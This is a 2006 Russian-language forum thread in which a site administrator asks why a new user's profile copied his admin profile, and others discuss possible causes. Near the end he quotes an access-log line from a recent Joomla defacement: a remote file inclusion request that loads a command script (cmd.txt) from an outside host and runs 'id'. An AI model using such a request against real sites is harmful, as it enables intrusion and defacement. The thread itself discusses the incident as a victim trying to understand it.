На днях на моем форуме появился очередной новый пользователь, и я был шокирован, когда увидел, что в его профиле значится вся информация, которая прописана в моем, то есть админском профиле. Например, дата регистрации - 10.05.05, а не 16.11.06, также прописан мой день рождения, моя подпись, но главное - мое количество постов (682), и распределение этих постов в процентах по разделам форума. Разве что админских прав у пользователя не было. Как это можно объяснить? Была ли это попытка украсть у меня мой профиль с админскими правами? Или просто форум сглючил?
Пользователя я на всякий случай удалил. Форум - FullMods 0.1.4
1. SysteM - 18 Ноября, 2006 - 04:40:48 - перейти к сообщению
2. TvoyWeb - 18 Ноября, 2006 - 09:31:15 - перейти к сообщению
SysteM
Интересноа вещь..... я подумаю как такое могло случиться.
Интересноа вещь..... я подумаю как такое могло случиться.
3. Валерий - 18 Ноября, 2006 - 10:10:52 - перейти к сообщению
SysteM
Ты поспешил удалить этого пользователя. Нужно было просто заблокировать.
Потом посмотреть его посты. ты ведь самого главного не увидел - что он писал.
Потом - нужно было открыть папку юзеров и там всю инфу глянуть. тот же пароль сравнить с твоим.
А ты сам ничего не перекачивал никуда?
Мне кажется, это не кто-то регился, а просто твой дубль появился некоим образом.
Ты поспешил удалить этого пользователя. Нужно было просто заблокировать.
Потом посмотреть его посты. ты ведь самого главного не увидел - что он писал.
Потом - нужно было открыть папку юзеров и там всю инфу глянуть. тот же пароль сравнить с твоим.
А ты сам ничего не перекачивал никуда?
Мне кажется, это не кто-то регился, а просто твой дубль появился некоим образом.
4. SysteM - 18 Ноября, 2006 - 13:28:55 - перейти к сообщению
Пользователь за полтора дня ничего не написал, да и не похоже на простую копию моего профиля, т.к. сам я точно ничего не перекачивал или копировал, и у пользователя был ник и регистрационный е-мейл, отличные от моего.
Пароль на форуме пользователи сами задавать не могут, их генерит сам форум.
Да, удалить может быть и поторопился, но просто буквально позавчера хакнули главную часть этого же сайта, работающую на CMS Joomla - ничего серьезного, просто дефейс главной странички сделали, но все равно теперь я уже настороже.
Пароль на форуме пользователи сами задавать не могут, их генерит сам форум.
Да, удалить может быть и поторопился, но просто буквально позавчера хакнули главную часть этого же сайта, работающую на CMS Joomla - ничего серьезного, просто дефейс главной странички сделали, но все равно теперь я уже настороже.
5. TvoyWeb - 18 Ноября, 2006 - 17:01:17 - перейти к сообщению
SysteM пишет:
но просто буквально позавчера хакнули главную часть этого же сайта
Возможно в это же время и была сделана копия твоего файла.
6. SysteM - 18 Ноября, 2006 - 17:49:38 - перейти к сообщению
Не думаю... Взлом был совершен следующим образом:
и если заглянуть в файл cmd.txt по ссылке, указанной в куске лога, то не видно никакой связи между форумом ExBB и этим скриптом-взломщиком. Хотя с другой стороны я плохо знаю php, чтобы судить об этом.
CODE:
88.226.0.79 - - [16/Nov/2006:13:32:06 +0300] GET /administrator/components/com_******/********_absolute_path=http://www.nyers.hu/cmd.txt?&list=1&cmd=id
и если заглянуть в файл cmd.txt по ссылке, указанной в куске лога, то не видно никакой связи между форумом ExBB и этим скриптом-взломщиком. Хотя с другой стороны я плохо знаю php, чтобы судить об этом.